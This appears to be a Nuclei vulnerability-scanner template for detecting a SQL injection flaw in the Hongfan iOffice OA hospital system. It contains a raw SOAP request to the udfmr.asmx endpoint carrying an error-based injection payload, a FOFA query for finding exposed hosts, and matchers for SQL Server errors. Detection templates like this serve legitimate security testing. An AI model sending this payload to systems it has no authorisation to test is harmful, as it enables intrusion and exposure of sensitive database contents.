2023-08-21 18:05:11 +00:00
id : hongfan-ioffice-sqli
info :
name : Hongfan OA udfmr.asmx - SQL injection
author : SleepingBag945
severity : high
description : |
There is a SQL injection vulnerability in Hongfan iOffice 10 Hospital Edition, which can be exploited by attackers to obtain sensitive database information.
reference :
- https://github.com/lal0ne/vulnerability/blob/main/%E7%BA%A2%E5%B8%86OA/iOffice_sqlscan/sql.py
- https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%BA%A2%E5%B8%86%E5%8C%BB%E7%96%97%E4%BA%91%20OA%20udfmr.asmx%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata :
verified : true
2023-10-14 11:27:55 +00:00
max-request : 1
2023-08-21 18:05:11 +00:00
fofa-query : app="红帆-ioffice"
tags : hongfan,oa,sqli
http :
- raw :
- |
POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.1
Host : {{Hostname}}
Content-Type : text/xml; charset=utf-8
SOAPAction : http://tempuri.org/ioffice/udfmr/GetEmpSearch
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">
<condition>1=db_name(1)</condition>
</GetEmpSearch>
</soap:Body>
</soap:Envelope>
matchers-condition : and
matchers :
- type : word
part : body
words :
- "System.Data.SqlClient.SqlException:"
- "nvarchar"
condition : and
- type : word
part : header
words :
- "text/xml"
- type : status
status :
- 500
2023-10-20 11:41:13 +00:00
# digest: 4a0a00473045022100ab635da4a8372e7658b8d77e2f8d7dbb9ee5b591a8f09602674ec79866beef2b0220696c21a967473b2a408c567b7da2d69e39f96f3e74a639953255245c0bd2ce34:922c64590222798bb761d5b6d8e72950